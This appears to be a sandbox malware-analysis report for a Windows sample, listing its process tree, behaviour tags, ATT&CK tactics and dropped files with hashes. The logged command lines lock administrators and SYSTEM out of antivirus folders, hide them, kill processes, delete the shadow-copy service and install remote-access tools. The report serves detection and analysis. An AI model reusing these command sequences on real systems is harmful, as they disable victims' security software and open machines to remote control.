C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)

Modifies file permissions

PID:5576

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)

PID:5452

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)

PID:4392

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)

PID:6132

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)

PID:4292

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)

PID:5540

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)

PID:4712

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny Администраторы:(OI)(CI)(F)

PID:4408

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Doctor Web" /deny Администраторы:(OI)(CI)(F)

Modifies file permissions

PID:1704

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny Администраторы:(OI)(CI)(F)

PID:4964

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\grizzly" /deny Администраторы:(OI)(CI)(F)

PID:2668

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny Администраторы:(OI)(CI)(F)

PID:816

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Cezurity" /deny Администраторы:(OI)(CI)(F)

Modifies file permissions

PID:5260

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny Администраторы:(OI)(CI)(F)

PID:5516

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Cezurity" /deny Администраторы:(OI)(CI)(F)

PID:3152

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny Администраторы:(OI)(CI)(F)

PID:5292

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\McAfee" /deny Администраторы:(OI)(CI)(F)

PID:1456

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny Администраторы:(OI)(CI)(F)

PID:4880

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Avira" /deny Администраторы:(OI)(CI)(F)

Modifies file permissions

PID:5720

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Администраторы:(OI)(CI)(F)

PID:5300

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Администраторы:(OI)(CI)(F)

PID:4696

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny Администраторы:(OI)(CI)(F)

PID:6000

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\ESET" /deny Администраторы:(OI)(CI)(F)

PID:5772

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)

PID:4936

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)

PID:5416

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny Администраторы:(OI)(CI)(F)

PID:4372

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\ESET" /deny Администраторы:(OI)(CI)(F)

PID:5844

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)

PID:5436

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)

Modifies file permissions

PID:744

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny Администраторы:(OI)(CI)(F)

PID:4228

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Panda Security" /deny Администраторы:(OI)(CI)(F)

Modifies file permissions

PID:5572

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat

Drops file in Drivers directory

PID:5900

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat

PID:6044

C:\Windows\SysWOW64\timeout.exe

TIMEOUT /T 5 /NOBREAK

Delays execution with timeout.exe

PID:1120

C:\Windows\SysWOW64\timeout.exe

TIMEOUT /T 3 /NOBREAK

Delays execution with timeout.exe

PID:5248

C:\Windows\SysWOW64\taskkill.exe

TASKKILL /IM 1.exe /T /F

Kills process with taskkill

PID:5240

C:\Windows\SysWOW64\taskkill.exe

TASKKILL /IM P.exe /T /F

Kills process with taskkill

PID:5060

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S C:\Programdata\Windows

Views/modifies file attributes

PID:5992

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Intel\BLOCK.bat

PID:3156

C:\Windows\SysWOW64\taskkill.exe

TASKKILL /IM iediagcmd.exe /T /F

Kills process with taskkill

PID:1504

C:\Windows\SysWOW64\icacls.exe

icacls "C:\windows\speechstracing" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

Modifies file permissions

PID:5976

C:\Windows\SysWOW64\icacls.exe

icacls "C:\windows\speechstracing" /deny system:(OI)(CI)(F)

PID:4916

C:\Windows\SysWOW64\icacls.exe

icacls "c:\program files\Internet Explorer\bin" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

Modifies file permissions

PID:400

C:\Windows\SysWOW64\icacls.exe

icacls "c:\program files\Internet Explorer\bin" /deny System:(OI)(CI)(F)

Modifies file permissions

PID:4516

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S "C:\Program Files\360\Total Security"

Drops file in Program Files directory
Views/modifies file attributes

PID:4164

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\360\Total Security" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

PID:5468

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S C:\ProgramData\360TotalSecurity

Views/modifies file attributes

PID:3540

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S C:\ProgramData\360safe

Views/modifies file attributes

PID:4008

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\360TotalSecurity" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

Modifies file permissions

PID:5628

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\360safe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

Modifies file permissions

PID:4100

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S C:\ProgramData\Avira

Views/modifies file attributes

PID:5972

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Avira" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

Modifies file permissions

PID:5152

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S "C:\ProgramData\Package Cache"

Views/modifies file attributes

PID:6068

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Package Cache" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

Modifies file permissions

PID:5932

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S "C:\Program Files\ESET"

Drops file in Program Files directory
Views/modifies file attributes

PID:5440

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\ESET" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

PID:2864

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S C:\ProgramData\ESET

Views/modifies file attributes

PID:5644

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\ESET" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

Modifies file permissions

PID:5472

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S "C:\Program Files\AVAST Software\Avast"

Drops file in Program Files directory
Views/modifies file attributes

PID:5204

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\AVAST Software\Avast" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

PID:1164

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S "C:\Programdata\AVAST Software"

Views/modifies file attributes

PID:5360

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\AVAST Software" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

PID:6104

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S "C:\Programdata\Kaspersky Lab"

Views/modifies file attributes

PID:5448

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S "C:\Programdata\Kaspersky Lab Setup Files"

Views/modifies file attributes

PID:5648

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\Kaspersky Lab" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

PID:6072

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

PID:4612

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S "C:\AdwCleaner"

Views/modifies file attributes

PID:5368

C:\Windows\SysWOW64\icacls.exe

icacls "C:\AdwCleaner" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

Modifies file permissions

PID:1616

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S "C:\Program Files\Malwarebytes\Anti-Malware"

Drops file in Program Files directory
Views/modifies file attributes

PID:4160

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Malwarebytes\Anti-Malware" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

Modifies file permissions

PID:5492

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S "c:\programdata\Malwarebytes"

Views/modifies file attributes

PID:1816

C:\Windows\SysWOW64\icacls.exe

icacls "c:\programdata\Malwarebytes" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

Modifies file permissions

PID:4112

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S "C:\Programdata\MB3Install"

Views/modifies file attributes

PID:6028

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\MB3Install" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

PID:204

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S "C:\KVRT_Data"

Views/modifies file attributes

PID:2404

C:\Windows\SysWOW64\icacls.exe

icacls "C:\KVRT_Data" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

PID:4996

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S "C:\ProgramData\Norton"

Views/modifies file attributes

PID:5164

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Norton" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

PID:4324

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S "C:\ProgramData\Avg"

Views/modifies file attributes

PID:3792

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Avg" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

Modifies file permissions

PID:5924

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S "C:\ProgramData\grizzly"

Views/modifies file attributes

PID:5548

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\grizzly" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

Modifies file permissions

PID:5200

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S "C:\ProgramData\Doctor Web"

Views/modifies file attributes

PID:4276

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Doctor Web" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

Modifies file permissions

PID:5744

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S "C:\ProgramData\Indus"

Views/modifies file attributes

PID:5696

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Indus" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

PID:3220

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S "C:\WINDOWS\McMwt"

Drops file in Windows directory
Views/modifies file attributes

PID:5284

C:\Windows\SysWOW64\icacls.exe

icacls "C:\WINDOWS\McMwt" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

PID:4604

C:\Windows\SysWOW64\icacls.exe

icacls "C:\WINDOWS\McMwt" /deny System:(OI)(CI)(F)

PID:5504

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\lsass2.exe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

Modifies file permissions

PID:4464

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\lsass2.exe" /deny System:(OI)(CI)(F)

PID:4444

C:\Windows\SysWOW64\timeout.exe

timeout 1

Delays execution with timeout.exe

PID:5728

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\lsass.exe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

Modifies file permissions

PID:4004

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\lsass.exe" /deny System:(OI)(CI)(F)

PID:4216

C:\Windows\SysWOW64\icacls.exe

icacls "C:\windows\boy.exe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

Modifies file permissions

PID:2192

C:\Windows\SysWOW64\icacls.exe

icacls "C:\windows\boy.exe" /deny System:(OI)(CI)(F)

Modifies file permissions

PID:5528

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S "C:\ProgramData\Microsoft\Intel"

Views/modifies file attributes

PID:4968

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S "C:\ProgramData\Microsoft\Check"

Views/modifies file attributes

PID:5304

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S "C:\ProgramData\Microsoft\Temp"

Views/modifies file attributes

PID:5784

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete swprv

PID:2544

C:\Windows\SysWOW64\sc.exe

sc delete swprv

PID:812

C:\ProgramData\Windows\rutserv.exe

C:\ProgramData\Windows\rutserv.exe

Executes dropped EXE
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory

PID:420

C:\ProgramData\Windows\rfusclient.exe

C:\ProgramData\Windows\rfusclient.exe /tray

Executes dropped EXE

PID:760

C:\ProgramData\Windows\rfusclient.exe

C:\ProgramData\Windows\rfusclient.exe

Executes dropped EXE

PID:2928

C:\ProgramData\Windows\rfusclient.exe

C:\ProgramData\Windows\rfusclient.exe /tray

Executes dropped EXE
Suspicious behavior: SetClipboardViewer

PID:3464

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

PID:2080

\??\c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k networkservice -s TermService

PID:4424

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -s TermService

Loads dropped DLL

PID:5460

Network

MITRE ATT&CK Matrix

Collection

Data from Local System

Command and Control

Credential Access

Credentials in Files

Defense Evasion

Discovery

Execution

Command-Line Interface

Exfiltration

Impact

Service Stop

Initial Access

Lateral Movement

Persistence

Privilege Escalation

Bypass User Account Control

Replay Monitor

00:00 00:00

Downloads

C:\Program Files\Common Files\System\iediagcmd.exe

Download Submit
C:\Program Files\Common Files\System\iexplore.exe

Download Submit
C:\ProgramData\Microsoft\Intel\BLOCK.bat

Download Submit
C:\ProgramData\Microsoft\Intel\R8.exe

Download Submit
C:\ProgramData\Microsoft\Intel\taskhost.exe

Download Submit
C:\ProgramData\Microsoft\Intel\taskhost.exe

Download Submit
C:\ProgramData\Microsoft\Intel\wini.exe

Download Submit
C:\ProgramData\Microsoft\Intel\wini.exe

Download Submit
C:\ProgramData\RealtekHD\taskhostw.exe

Download Submit
C:\ProgramData\WindowsTask\winlogon.exe
MD5
ec0f9398d8017767f86a4d0e74225506

SHA1
720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36

SHA256
870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375

SHA512
d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484

Download Submit
C:\ProgramData\Windows\install.vbs

Download Submit
C:\ProgramData\Windows\reg1.reg

Download Submit
C:\ProgramData\Windows\reg2.reg

Download Submit
C:\ProgramData\Windows\rfusclient.exe
MD5
b8667a1e84567fcf7821bcefb6a444af

SHA1
9c1f91fe77ad357c8f81205d65c9067a270d61f0

SHA256
dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9

SHA512
ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852

Download Submit
C:\ProgramData\Windows\rfusclient.exe
MD5
b8667a1e84567fcf7821bcefb6a444af

SHA1
9c1f91fe77ad357c8f81205d65c9067a270d61f0

SHA256
dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9

SHA512
ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852

Download Submit
C:\ProgramData\Windows\rfusclient.exe
MD5
b8667a1e84567fcf7821bcefb6a444af

SHA1
9c1f91fe77ad357c8f81205d65c9067a270d61f0

SHA256
dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9

SHA512
ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852

Download Submit
C:\ProgramData\Windows\rfusclient.exe
MD5
b8667a1e84567fcf7821bcefb6a444af

SHA1
9c1f91fe77ad357c8f81205d65c9067a270d61f0

SHA256
dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9

SHA512
ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852

Download Submit
C:\ProgramData\Windows\rutserv.exe
MD5
37a8802017a212bb7f5255abc7857969

SHA1
cb10c0d343c54538d12db8ed664d0a1fa35b6109

SHA256
1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

SHA512
4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

Download Submit
C:\ProgramData\Windows\rutserv.exe
MD5
37a8802017a212bb7f5255abc7857969

SHA1
cb10c0d343c54538d12db8ed664d0a1fa35b6109

SHA256
1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

SHA512
4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

Download Submit
C:\ProgramData\Windows\rutserv.exe
MD5
37a8802017a212bb7f5255abc7857969

SHA1
cb10c0d343c54538d12db8ed664d0a1fa35b6109

SHA256
1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

SHA512
4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

Download Submit
C:\ProgramData\Windows\rutserv.exe
MD5
37a8802017a212bb7f5255abc7857969

SHA1
cb10c0d343c54538d12db8ed664d0a1fa35b6109

SHA256
1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

SHA512
4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

Download Submit
C:\ProgramData\Windows\rutserv.exe
MD5
37a8802017a212bb7f5255abc7857969

SHA1
cb10c0d343c54538d12db8ed664d0a1fa35b6109

SHA256
1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

SHA512
4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

Download Submit
C:\ProgramData\Windows\vp8decoder.dll
MD5
88318158527985702f61d169434a4940

SHA1
3cc751ba256b5727eb0713aad6f554ff1e7bca57

SHA256
4c04d7968a9fe9d9258968d3a722263334bbf5f8af972f206a71f17fa293aa74

SHA512
5d88562b6c6d2a5b14390512712819238cd838914f7c48a27f017827cb9b825c24ff05a30333427acec93cd836e8f04158b86d17e6ac3dd62c55b2e2ff4e2aff

Download Submit
C:\ProgramData\Windows\vp8encoder.dll
MD5
6298c0af3d1d563834a218a9cc9f54bd

SHA1
0185cd591e454ed072e5a5077b25c612f6849dc9

SHA256
81af82019d9f45a697a8ca1788f2c5c0205af9892efd94879dedf4bc06db4172

SHA512
389d89053689537cdb582c0e8a7951a84549f0c36484db4346c31bdbe7cb93141f6a354069eb13e550297dc8ec35cd6899746e0c16abc876a0fe542cc450fffe

Download Submit
C:\ProgramData\Windows\winit.exe

Download Submit
C:\ProgramData\Windows\winit.exe

Download Submit
C:\ProgramData\install\cheat.exe

Download Submit
C:\ProgramData\install\sys.exe

Download Submit
C:\ProgramData\install\sys.exe
MD5
bfa81a720e99d6238bc6327ab68956d9

SHA1
c7039fadffccb79534a1bf547a73500298a36fa0

SHA256
222a8bb1b3946ff0569722f2aa2af728238778b877cebbda9f0b10703fc9d09f

SHA512
5ba1fab68a647e0a0b03d8fba5ab92f4bdec28fb9c1657e1832cfd54ee7b5087ce181b1eefce0c14b603576c326b6be091c41fc207b0068b9032502040d18bab

Download Submit
C:\Programdata\Install\del.bat

Download Submit
C:\Programdata\RealtekHD\taskhostw.exe

Download Submit
C:\Programdata\WindowsTask\winlogon.exe
MD5
ec0f9398d8017767f86a4d0e74225506

SHA1
720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36

SHA256
870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375

SHA512
d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484

Download Submit
C:\Programdata\Windows\install.bat

Download Submit
C:\Programdata\kz.exe

Download Submit
C:\Programdata\lsass.exe

Download Submit
C:\Programdata\lsass2.exe

Download Submit
C:\Programdata\olly.exe

Download Submit
C:\Programdata\script.exe

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB

Download Submit
C:\Windows\SysWOW64\drivers\conhost.exe

Download Submit
C:\Windows\boy.exe

Download Submit
C:\Windows\java.exe

Download Submit
C:\programdata\install\cheat.exe

Download Submit
C:\programdata\microsoft\intel\R8.exe

Download Submit
C:\programdata\microsoft\temp\H.bat

Download Submit
C:\programdata\microsoft\temp\Temp.bat

Download Submit
C:\rdp\RDPWInst.exe

Download Submit
C:\rdp\RDPWInst.exe

Download Submit
C:\rdp\RDPWInst.exe

Download Submit
C:\rdp\Rar.exe

Download Submit
C:\rdp\Rar.exe

Download Submit
C:\rdp\bat.bat

Download Submit
C:\rdp\db.rar

Download Submit
C:\rdp\install.vbs

Download Submit
C:\rdp\pause.bat

Download Submit
C:\rdp\run.vbs

Download Submit
\??\PIPE\RManFUSCallbackNotify32

Download Submit
\??\PIPE\RManFUSCallbackNotify32

Download Submit
\??\c:\program files\rdp wrapper\rdpwrap.dll

Download Submit
\??\c:\program files\rdp wrapper\rdpwrap.ini

Download Submit
\??\c:\windows\svchost.exe

Download Submit
\Program Files\RDP Wrapper\rdpwrap.dll

Download Submit
\Users\Admin\AppData\Local\Temp\4210A729\mozglue.dll

Download Submit
\Users\Admin\AppData\Local\Temp\4210A729\msvcp140.dll

Download Submit
\Users\Admin\AppData\Local\Temp\4210A729\nss3.dll

Download Submit
\Users\Admin\AppData\Local\Temp\4210A729\vcruntime140.dll

Download Submit
\Users\Admin\AppData\Local\Temp\4210A729\vcruntime140.dll

Download Submit
\Users\Admin\AppData\Local\Temp\4210A729\vcruntime140.dll

Download Submit
memory/204-565-0x0000000000000000-mapping.dmp

Download
memory/348-393-0x0000000000000000-mapping.dmp

Download
memory/356-38-0x0000000000000000-mapping.dmp

Download
memory/388-397-0x0000000000000000-mapping.dmp

Download
memory/396-88-0x0000000000000000-mapping.dmp

Download
memory/400-534-0x0000000000000000-mapping.dmp

Download
memory/504-445-0x0000000000000000-mapping.dmp

Download
memory/744-521-0x0000000000000000-mapping.dmp

Download
memory/748-220-0x0000000000000000-mapping.dmp

Download
memory/752-109-0x0000000000000000-mapping.dmp

Download
memory/756-69-0x0000000000000000-mapping.dmp

Download
memory/760-52-0x0000000000000000-mapping.dmp

Download
memory/812-76-0x0000000000000000-mapping.dmp

Download
memory/816-504-0x0000000000000000-mapping.dmp

Download
memory/820-93-0x0000000000000000-mapping.dmp

Download
memory/864-221-0x0000000000000000-mapping.dmp

Download
memory/868-243-0x0000000000000000-mapping.dmp

Download
memory/888-178-0x0000000000000000-mapping.dmp

Download
memory/1004-111-0x0000000000000000-mapping.dmp

Download
memory/1012-310-0x0000000000000000-mapping.dmp

Download
memory/1028-64-0x0000000000000000-mapping.dmp

Download
memory/1036-159-0x0000000000000000-mapping.dmp

Download
memory/1120-528-0x0000000000000000-mapping.dmp

Download
memory/1140-187-0x0000000000000000-mapping.dmp

Download
memory/1164-551-0x0000000000000000-mapping.dmp

Download
memory/1312-440-0x0000000000000000-mapping.dmp

Download
memory/1372-114-0x0000000000000000-mapping.dmp

Download
memory/1444-353-0x0000000000000000-mapping.dmp

Download
memory/1456-509-0x0000000000000000-mapping.dmp

Download
memory/1500-90-0x0000000000000000-mapping.dmp

Download
memory/1504-531-0x0000000000000000-mapping.dmp

Download
memory/1524-4-0x0000000000000000-mapping.dmp

Download
memory/1528-22-0x0000000000000000-mapping.dmp

Download
memory/1532-115-0x0000000000000000-mapping.dmp

Download
memory/1544-62-0x0000000000000000-mapping.dmp

Download
memory/1560-479-0x0000000000000000-mapping.dmp

Download
memory/1596-405-0x0000000000000000-mapping.dmp

Download
memory/1616-559-0x0000000000000000-mapping.dmp

Download
memory/1624-266-0x0000000000000000-mapping.dmp

Download
memory/1704-501-0x0000000000000000-mapping.dmp

Download
memory/1816-562-0x0000000000000000-mapping.dmp

Download
memory/1836-23-0x0000000000000000-mapping.dmp

Download
memory/1872-103-0x0000000000000000-mapping.dmp

Download
memory/1932-124-0x0000000000000000-mapping.dmp

Download
memory/1968-77-0x0000000000000000-mapping.dmp

Download
memory/2032-105-0x0000000000000000-mapping.dmp

Download
memory/2036-106-0x0000000000000000-mapping.dmp

Download
memory/2060-89-0x0000000000000000-mapping.dmp

Download
memory/2100-441-0x0000000000000000-mapping.dmp

Download
memory/2116-101-0x0000000000000000-mapping.dmp

Download
memory/2132-399-0x0000000000000000-mapping.dmp

Download
memory/2148-108-0x0000000000000000-mapping.dmp

Download
memory/2164-57-0x0000000000000000-mapping.dmp

Download
memory/2176-463-0x0000000000000000-mapping.dmp

Download
memory/2180-72-0x0000000000000000-mapping.dmp

Download
memory/2192-587-0x0000000000000000-mapping.dmp

Download
memory/2204-172-0x0000000000000000-mapping.dmp

Download
memory/2208-27-0x0000000000000000-mapping.dmp

Download
memory/2220-110-0x0000000000000000-mapping.dmp

Download
memory/2236-122-0x0000000000000000-mapping.dmp

Download
memory/2240-61-0x0000000000000000-mapping.dmp

Download
memory/2248-236-0x0000000000000000-mapping.dmp

Download
memory/2260-158-0x0000000000000000-mapping.dmp

Download
memory/2276-461-0x0000000000000000-mapping.dmp

Download
memory/2288-201-0x0000000000000000-mapping.dmp

Download
memory/2348-123-0x0000000000000000-mapping.dmp

Download
memory/2356-457-0x0000000000000000-mapping.dmp

Download
memory/2404-566-0x0000000000000000-mapping.dmp

Download
memory/2408-71-0x0000000000000000-mapping.dmp

Download
